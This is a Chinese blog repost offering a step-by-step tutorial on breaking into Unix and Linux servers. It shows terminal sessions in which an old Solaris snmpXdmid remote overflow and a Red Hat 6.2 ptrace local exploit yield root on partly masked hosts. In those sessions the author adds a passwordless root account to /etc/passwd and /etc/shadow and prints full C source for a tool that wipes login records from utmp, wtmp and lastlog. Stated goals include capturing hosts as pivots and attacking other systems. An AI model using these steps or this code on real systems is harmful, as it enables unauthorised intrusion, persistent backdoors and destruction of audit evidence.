linux php 入侵,入侵linux教程 - 冷漠 ' Blog - Focus on Information Security !
来源:IT168
一:基本知识
1:常见UNIX版本:
SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,Mks Toolkit,NetNSD,OSF/I,System V Unix,Unicos,Unix ware...
2:简单介绍几个
sunos&solaris SUN本来想用solaris取代sunos,不过在用户的要求下,到目前为止,还是维持两者并存的政策;
Freebsd是著名的BSD-UNIX的一的继承者,是UNIX众多分支中相当稳定的一个,很多ISP均使用运行Freebsd;
Linux是一个面对PC机个人用户的自由廉价的UNIX产品(其硬件平台是Intel系列的CPU),实际上众多的网络管理员真正使用的是Linux。
3:UNIX操作系统的特点
(1)多用户和多任务;(2)可移植性;(3)树行结构的文件系统;(4)I/O重定向技术和管道技术;(5)丰富的实用程序;(6)每个用户都有电子邮件。
4:尤为突出的优点
(1)稳定可靠性高;(2)网络功能强;(3)开发性好;(4)强大的数据库支持功能;(5)伸缩性强。
二:入侵目的
1:学习UNIX,熟悉内部操作,整体配置...
2:做跳板或以此捕捉更多UNIX肉鸡;
3:越权得到某些正常请求下得不到的东西;
4:攻击破坏或以此作为利器来破坏其他系统;
5:更多......
三:入侵方法
1:寻找目标
工具:supperscan,流光,LANguard Network Scanner 2.0或者其他,凭个人喜好选用
supperscan:扫描23,79端口,注意含%,#,&...主机,这些就是UNIX;
LANguard..作简单设置,即可开始,判断对方操作系统功能乃同类软件中的精品,直观准确;
流光:利用高级扫描,选telnet,PRC,POP3,FTP,Finger即可。
其他方法一样...
(说明:很多管理员为了迷惑入侵者往往故意更改telnet登陆时出现的信息,请注意识别)
2:开始入侵
(1)溢出(所有关于UNIX的溢出,都需要在一个UNIX/Linux的环境下进行编译)
A:远程溢出
溢出?呵呵,太多了!随便说几个:freebsd远程溢出,bind 远程溢出,Sun Solaris 5.7/5.8 Sparc远程溢出,redhat6.xrpc status远程溢出...自己去一一了解吧,在这里我简单说两个例子:
a1:考虑到很多朋友使用windows,所以大家可以参看我的兄弟---蓝骑士的大作《freebsd溢出完全图文版》(地址:http://www.itser.com/ez/.bbs/topic.cgi?forum=7&topic=25&show=),因为这个溢出程序有已经编译好了可以直接在windows下使用;
a2:Sun Solaris 5.7 Sparc远程溢出
搜索...终于让我找到了一台sunos 5.7,上我一台sunos 5.8
telnet 66.*.146.48 ----->>这是我的!
SunOS 5.8
login: ply
Password:
Last login: Tue Apr 23 03:55:09 from 39448.ddn.xaonli
Sun Microsystems Inc. SunOS 5.8 Generic February 2000
$ tmp/.sh ----->>当时溢出时做的处理!
# ls
bin data etc initrd mnt proc sbin usr
boot dev home lib misc opt root tmp var
xfn skip
# cat >snmp.c
....... ----->>太长了,省略...自己去找!
# gcc -o snmp snmp.c ----->>用gcc编译
snmp.c: In function `main':
snmp.c:181: warning: passing arg 3 of pointer to function from incompatible pointer type
snmp.c:181: warning: passing arg 4 of pointer to function from incompatible pointer type
snmp.c:181: warning: passing arg 5 of pointer to function from incompatible pointer type
# ls
bin data etc initrd mnt proc sbin snmp usr
boot dev home lib misc opt root snmp.c tmp var
# ./snmp
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
usage: ./s address [-p port] -v 7|8
#./snmp 216.*.45.63 -v 7 ---->开始溢出!!
DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
adr=0x000c8f68 timeout=30 port=928 connected!
sent!
SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u sparc SUNW,Ultra-80
id
uid=0(root) gid=0(root) ----->>是root哦!
echo "ply::0:0::/:/bin/bash" >> /etc/passwd ----->>加个用户先!
echo "ply::::::::" >> /etc/shadow
... ----->>还想干什么就继续吧!
B:本地溢出
本地溢出需要一个具有Shell权限的帐号,这个帐号可以通过pop3或ftp弱密码得到,照样举个例子:
流光扫描...一会儿得到了一个ftp帐号(webmaster,webmaster),先telnet上去!
telnet *.174.62.135
Red Hat Linux release 6.2 (Cartman) ----->>linux 6.2,容易搞定!
Kernel 2.2.12-20kr2smp on an i686
login: webmaster
Password:
Last login: Wed Apr 24 02:21:58 from *.*.*.*
You have mail. ----->>这家伙有新邮件,不过我没兴趣!
[webmaster@ns webmaster]$ ----->>气人的普通用户$
[webmaster@ns webmaster]$cat >ts.c
... ----->>要学会利用网络资源,自己找,当是练习!
[webmaster@ns webmaster]$gcc -o ts ts.c ----->>还是用gcc编译。
In file included from /usr/include/asm/user.h:5,
from /usr/include/linux/user.h:1,
from ts.c:30:
/usr/include/linux/ptrace.h:22: warning: `PTRACE_SYSCALL' redefined
/usr/include/sys/ptrace.h:103: warning: this is the location of the previous def
inition
[webmaster@ns webmaster]$ ls
Desktop/ Mail/ ts* ts.c
[webmaster@ns webmaster]$ ./ts
attached
bash# su root
[root@ns webmaster]# ----->>搞定,看见#我就高兴!
[root@ns webmaster]# cat >wipe.c ----->>扫脚印的,这个还是给大家吧,否则有人要扁我了!
/*=============================================================================
UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD
The Shadow Penguin Security ( http://shadowpenguin.backsection.net )
Written by UNYUN ( unewn4th@usa.net )
=============================================================================
*/
#include
#include
#include
#include
#ifdef UTMAXTYPE
#define UTMPX
#include
#endif
#include
#ifndef _PATH_LASTLOG
#include
#endif
#include
#include
#include
#define SVR4_UTMP "/var/adm/utmp"
#define SVR4_WTMP "/var/adm/wtmp"
#define SVR4_LASTLOG "/var/adm/lastlog"
#define SUNOS4_UTMP "/etc/utmp"
#define SUNOS4_WTMP "/usr/adm/wtmp"
#define SUNOS4_LASTLOG "/usr/adm/lastlog"
#define BSD_UTMP "/var/run/utmp"
#define BSD_WTMP "/var/log/wtmp"
#define BSD_LASTLOG "/var/log/lastlog"
#define MAX_FPATH 512
int wipe_log(path,user,type)
char *path,*user;
int type;
{
struct utmp utmp_ent;
#ifdef UTMPX
struct utmpx utmpx_ent;
#endif
void *ent;
char *un;
int sz,fd,c=0;
if (strlen(path)==0) return(1);
if (type==0){
ent=(void *)&utmp_ent;
#ifdef UTMPX
un=(char *)&utmp_ent.ut_user;
#else
un=(char *)&utmp_ent.ut_name;
#endif
sz=sizeof(struct utmp);
}else{
#ifdef UTMPX
ent=(void *)&utmpx_ent;
un=(char *)&utmpx_ent.ut_user;
sz=sizeof(struct utmpx);
#endif
}
if ((fd=open(path,O_RDWR))<=0) return(-1);
while(read(fd,ent,sz)>0)
if (!strncmp(un,user,strlen(user))){
memset(ent,0,sz);
lseek(fd,-sz,SEEK_CUR);
write(fd,ent,sz);
c++;
}
close(fd);
printf("Wiped %d entries of %s from %s.\n",c,user,path);
return(0);
}
int wipe_lastlog(path,user,type)
char *path,*user;
int type;
{
struct passwd *p;
struct lastlog ent;
int fd;
char buffer[MAX_FPATH];
linux php 入侵,入侵linux教程 - 冷漠 ' Blog - Focus on Information Security !相关推荐
- Linux -- 利用IPS(入侵防御系统) 构建企业Web安全防护网
一.IPS系统简介 (应用层上应用) 防火墙只在网络层上应用,IPS 和防火墙相比,检测及过滤功能更为强大,它通过串联在网络主干线路上,对防火 墙所不能过滤的攻击进行过滤.这样一个两级的过滤模式,可以 ...
- Linux 主机被入侵后的处理案例
Linux主机被入侵后的处理案例 提交 我的留言 加载中 已留言 一次Linux被入侵后的分析 下面通过一个案例介绍下当一个服务器被rootkit入侵后的处理思路和处理过程,rootkit攻击是Lin ...
- Linux服务器被入侵之后的处理方法
安全事件处理流程 如上图,将服务器安全应急响应流程分为如下 8 个环节: 发现安全事件(核实)-现场保护–服务器保护-影响范围评估-在线分析-数据备份-深入分析----事件报告整理 各阶段说明 核实信 ...
- Kali Linux利用MSF入侵安卓手机(小白版超详细)
Kali Linux利用MSF入侵安卓手机 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行木马文件 3.运行msfconsole命令 4.配置参数 5.在靶机打开可执行文 ...
- Kali Linux利用MSF入侵安卓手机(零基础版超详细)
Kali Linux利用MSF入侵安卓手机 文章目录 Kali Linux利用MSF入侵安卓手机 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行木马文件 3.运行msfc ...
- Linux虚拟机sqlite数据库安装教程、命令实现sqlite
参考:Linux虚拟机sqlite数据库安装教程 作者:图触靓 发布时间: 2021-04-08 19:07:56 网址:https://blog.csdn.net/bhbhhyg/article/d ...
- Linux完全自学手册图文教程
2019独角兽企业重金招聘Python工程师标准>>> Linux是什么? Linux是一套免费使用和自由传播的类Unix的的操作系统,是一个基于POSIX和UNIX的多用户,多任务 ...
- 企业版mysql安装教程linux,linux上mysql安装详细教程
所有平台的MySQL下载地址为: MySQL 下载. 挑选你需要的 MySQL Community Server 版本及对应的平台. MySQL - MySQL服务器.你需要该选项,除非你只想连接运行 ...
- 《嵌入式 Linux应用程序开发标准教程(第2版)》——第1章 Linux快速入门 1.1 嵌入式Linux基础...
本节书摘来自异步社区<嵌入式 Linux应用程序开发标准教程(第2版)>一书中的第1章,第1.1节,作者 华清远见嵌入式培训中心,更多章节内容可以访问云栖社区"异步社区" ...
最新文章
- 进阶学习(3.7) Flyweight Pattern 享元模式
- CF396C On Changing Tree
- 商业软件中常见的修饰词
- 世界机器人冠军王宇航_★​身边的榜样,为你喝彩:我校学子摘冠第七届河南省VEX U机器人挑战赛...
- 排序算法入门之简单选择排序
- 遇见王沥川的人生感悟_23岁酱油泡饭默默无闻,31岁逆袭人生,王彦霖有何魅力?...
- 自定义处理网页选区字符并实时显示(js)
- 2019.8.2闭包,作用域
- NiFi-面向流程的大数据处理框架
- 解决EasyDSS、EasyNVR流媒体RTMP、HLS(m3u8)、HTTP-FLV播放提示H5播放错误的问题
- Linux基础命令操作
- 破解Visio时office失效,激活失败
- 【IoT智能单品设计】一款基于涂鸦智能IoT云平台的新型智能蓝牙水杯
- 主流GPS方案供应商大盘点
- 软件工程保研成功率_软件工程专业保研还是工作?
- ppt 插入柱状图及基础功能调整
- TIdTCPClient
- PowerBI报表页权限控制
- AUTOSAR 网络管理NM
- 第一章 会计学总论 详细笔记
热门文章
- mybatis 原理_了解Mybatis的工作原理吗
- java的基本数据类型有八种
- 用计算机怎么算lnk,lnk格式怎么处理!我的电脑除了系统自带其他软件都变成lnk格式...
- 【大数据】0001---使用SparkSQL关联两个表求和取前几行
- E20180715-hm
- 【BZOJ4991】我也不知道题目名字是什么(线段树)
- C# WinForm DataGridView 给标题列增加序号及格式化某个字段
- activity状态的保存和恢复
- 从0开始学Swift笔记整理(五)
- svn 把本地的项目,上传到服务器端